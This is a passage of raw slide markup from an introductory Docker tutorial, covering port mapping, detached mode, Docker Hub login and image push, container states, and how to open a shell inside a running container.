            <a:ext cx="29895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38.242.223.70</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>8080</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1800">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1152" name="Google Shape;1152;p193"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="3055825" y="1486325"/>
            <a:ext cx="1448100" cy="872700"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="9525">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="med" w="med" type="none"/>
            <a:tailEnd len="med" w="med" type="triangle"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1153" name="Google Shape;1153;p193"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6460975" y="933800"/>
            <a:ext cx="2247000" cy="55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9900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Detached mode or</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="FF9900"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="FF9900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Background mode</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1800">
              <a:solidFill>
                <a:srgbClr val="FF9900"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1154" name="Google Shape;1154;p193"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="5937800" y="1560600"/>
            <a:ext cx="1448100" cy="872700"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="9525">
            <a:solidFill>
              <a:srgbClr val="FF9900"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="med" w="med" type="none"/>
            <a:tailEnd len="med" w="med" type="triangle"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1155" name="Google Shape;1155;p193"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1202525" y="325750"/>
            <a:ext cx="11010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HostIP</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1800">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1156" name="Google Shape;1156;p193"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1932175" y="707675"/>
            <a:ext cx="798600" cy="546300"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="9525">
            <a:solidFill>
              <a:srgbClr val="8B008B"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="med" w="med" type="none"/>
            <a:tailEnd len="med" w="med" type="triangle"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1157" name="Google Shape;1157;p193"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7454700" y="218700"/>
            <a:ext cx="1448101" cy="412787"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1158" name="Google Shape;1158;p193"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2985150" y="2817825"/>
            <a:ext cx="525300" cy="1046400"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="9525">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="med" w="med" type="none"/>
            <a:tailEnd len="med" w="med" type="triangle"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1159" name="Google Shape;1159;p193"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="5937800" y="2803875"/>
            <a:ext cx="611100" cy="1074300"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="9525">
            <a:solidFill>
              <a:srgbClr val="9900FF"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="med" w="med" type="none"/>
            <a:tailEnd len="med" w="med" type="triangle"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1160" name="Google Shape;1160;p193"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="7148600" y="2803875"/>
            <a:ext cx="611100" cy="1074300"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="9525">
            <a:solidFill>
              <a:srgbClr val="8B008B"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="med" w="med" type="none"/>
            <a:tailEnd len="med" w="med" type="triangle"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1161" name="Google Shape;1161;p193"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="8227075" y="2803875"/>
            <a:ext cx="223500" cy="1079100"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="9525">
            <a:solidFill>
              <a:srgbClr val="0000CD"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="med" w="med" type="none"/>
            <a:tailEnd len="med" w="med" type="triangle"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1162" name="Google Shape;1162;p193"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4058275" y="2861625"/>
            <a:ext cx="495900" cy="1021500"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="9525">
            <a:solidFill>
              <a:srgbClr val="FF00FF"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="med" w="med" type="none"/>
            <a:tailEnd len="med" w="med" type="triangle"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1163" name="Google Shape;1163;p193"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4877600" y="4549650"/>
            <a:ext cx="2882100" cy="55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9900FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>hub.docker.com account</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1800">
              <a:solidFill>
                <a:srgbClr val="9900FF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1164" name="Google Shape;1164;p193"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="5894625" y="4235625"/>
            <a:ext cx="0" cy="401100"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="9525">
            <a:solidFill>
              <a:srgbClr val="9900FF"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="med" w="med" type="none"/>
            <a:tailEnd len="med" w="med" type="triangle"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1165" name="Google Shape;1165;p193"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3315625" y="4430600"/>
            <a:ext cx="1448100" cy="4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500">
                <a:solidFill>
                  <a:srgbClr val="006FC0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Port mapping</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1500">
              <a:solidFill>
                <a:srgbClr val="006FC0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1166" name="Google Shape;1166;p193"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5277738">
            <a:off x="3761234" y="3727695"/>
            <a:ext cx="556852" cy="956412"/>
          </a:xfrm>
          <a:prstGeom prst="arc">
            <a:avLst>
              <a:gd fmla="val 16200000" name="adj1"/>
              <a:gd fmla="val 5547086" name="adj2"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="19050">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="sm" w="sm" type="stealth"/>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67" name="Google Shape;1167;p193"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="2303400" y="1963700"/>
            <a:ext cx="587700" cy="587700"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="9525">
            <a:solidFill>
              <a:schemeClr val="accent1"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="med" w="med" type="none"/>
            <a:tailEnd len="med" w="med" type="triangle"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1168" name="Google Shape;1168;p193"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2543675" y="1692470"/>
            <a:ext cx="587700" cy="3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1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Port</a:t>
            </a:r>
            <a:endParaRPr b="1">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1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="357175" y="582050"/>
            <a:ext cx="8520600" cy="73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I want to work on Linux</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="210" name="Google Shape;210;p41"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="916425" y="1484700"/>
            <a:ext cx="7571100" cy="3361500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="91425">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-425926" lvl="0" marL="914400" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="6AA84F"/>
              </a:buClr>
              <a:buSzPts val="3108"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="3107">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Install Ubuntu on Your host machine </a:t>
            </a:r>
            <a:endParaRPr sz="3107">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-425926" lvl="0" marL="914400" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="6AA84F"/>
              </a:buClr>
              <a:buSzPts val="3108"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="3107">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Docker</a:t>
            </a:r>
            <a:endParaRPr sz="3107">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-425926" lvl="0" marL="914400" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="6AA84F"/>
              </a:buClr>
              <a:buSzPts val="3108"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="3107">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Get a Real Server(AWS/GCP/Azure/Contabo)</a:t>
            </a:r>
            <a:endParaRPr sz="3107">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-425926" lvl="0" marL="914400" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="6AA84F"/>
              </a:buClr>
              <a:buSzPts val="3108"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="3107">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>VirtualBox/VMWare</a:t>
            </a:r>
            <a:endParaRPr sz="3107">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>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pic>
        <p:nvPicPr>
          <p:cNvPr id="1173" name="Google Shape;1173;p194"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-56375" y="0"/>
            <a:ext cx="9200376" cy="5143500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1174" name="Google Shape;1174;p194"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4448200" y="1580400"/>
            <a:ext cx="5385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UP</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1175" name="Google Shape;1175;p194"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4448200" y="3626800"/>
            <a:ext cx="9657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Exited</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:schemeClr val="lt1"/>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95"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="793925"/>
            <a:ext cx="8520600" cy="3788400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-488950" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="38761D"/>
              </a:buClr>
              <a:buSzPts val="4100"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="4100">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>docker login</a:t>
            </a:r>
            <a:endParaRPr sz="4100">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="457200" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="4100">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>winpty docker login</a:t>
            </a:r>
            <a:endParaRPr sz="4100">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-488950" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="38761D"/>
              </a:buClr>
              <a:buSzPts val="4100"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="4100">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>docker container stop</a:t>
            </a:r>
            <a:endParaRPr sz="4100">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-488950" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="38761D"/>
              </a:buClr>
              <a:buSzPts val="4100"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="4100">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>docker container commit</a:t>
            </a:r>
            <a:endParaRPr sz="4100">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-488950" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="38761D"/>
              </a:buClr>
              <a:buSzPts val="4100"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="4100">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>docker image push</a:t>
            </a:r>
            <a:endParaRPr sz="4100">
              <a:solidFill>
                <a:srgbClr val="38761D"/>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pic>
        <p:nvPicPr>
          <p:cNvPr id="1185" name="Google Shape;1185;p196"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="9144000" cy="5143501"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1186" name="Google Shape;1186;p196"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2079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rPr>
              <a:t>PORT?</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1187" name="Google Shape;1187;p196"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5454875" y="1956150"/>
            <a:ext cx="111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rPr>
              <a:t>Open</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2800">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1188" name="Google Shape;1188;p196"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1905350" y="1847675"/>
            <a:ext cx="140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1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Close</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2800">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1189" name="Google Shape;1189;p196"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2037950" y="128550"/>
            <a:ext cx="1272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SSH - 22</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1190" name="Google Shape;1190;p196"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5238350" y="128550"/>
            <a:ext cx="1272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rPr>
              <a:t>SSH - 22</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1191" name="Google Shape;1191;p196"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="75300" y="4636825"/>
            <a:ext cx="8847900" cy="40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854545"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Port is like your HouseNo. in which a person can enter only if the port is open or Gate is Open</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1500">
              <a:solidFill>
                <a:srgbClr val="854545"/>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97"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="250475" y="60830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720">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>How to go inside docker container?</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3720">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1197" name="Google Shape;1197;p197"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="623075" y="1645375"/>
            <a:ext cx="7780200" cy="27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6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Syntax</a:t>
            </a:r>
            <a:endParaRPr sz="2500">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2500">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	docker container exec -it &lt;containerId&gt; &lt;Shell&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="2500">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
